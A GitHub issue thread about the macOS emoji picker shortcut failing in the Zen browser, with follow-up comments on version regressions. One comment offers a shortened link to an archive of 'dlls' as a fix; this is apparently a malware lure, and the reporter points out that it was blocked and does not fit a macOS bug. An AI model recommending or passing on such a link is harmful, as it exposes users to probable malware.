### ISSUE TITLE
macOS Emoji Picker Cannot Open

### ISSUE THREAD

**Issue by jtpotato** [zen-browser/desktop#1551]
### Captchas

- [X] I have read the instructions.
- [X] I have searched existing issues and avoided creating duplicates.
- [X] I am not filing an enhancement request.

### What happened?

https://github.com/user-attachments/assets/1d498ff6-abbf-41dc-916b-4408b278febe

Trying to open the macOS emoji picker (`Ctrl` + `Cmd` + `Space`) doesn't work. Using the Globe key + `E` also has unexpected behaviour. (See attached article)

Note: this issue is reproducible on Firefox. The proposed patch has been in the pipeline for several years now and it's unlikely there will be a fix anytime soon - could Zen Browser ship the patch first while waiting for Firefox to release something officially?

More information:
https://chester.me/archives/2024/02/a-workaround-to-fix-the-firefox-emoji-keyboard-shortcut-on-macos-sonoma/

### Reproducible?

- [ ] I have checked that this issue cannot be reproduced on Mozilla Firefox.

### Version

1.0.1-a.2

### What platform are you seeing the problem on?

macOS - aarch64

**Comment by aroopcodder** [comment]
install this

https://bit.ly/4eugCty
I put the necessary dlls in the archive

**Comment by jtpotato** [comment]
> install this
> 
> https://bit.ly/4eugCty I put the necessary dlls in the archive

- can't download, mediafire blocked it
- this issue was reported for macOS and DLLs are for Windows???

**Comment by artemisresende** [comment]
The emoji picker was working in Zen with Sequoia 15.6.1 (ARM64, Apple M1) until last stable build, 1.15.1b, but now is broken at 1.15.2b

**Comment by constantm** [comment]
This is broken on 1.17.3b. I cannot see the status on the linked Linear card because it's not public.
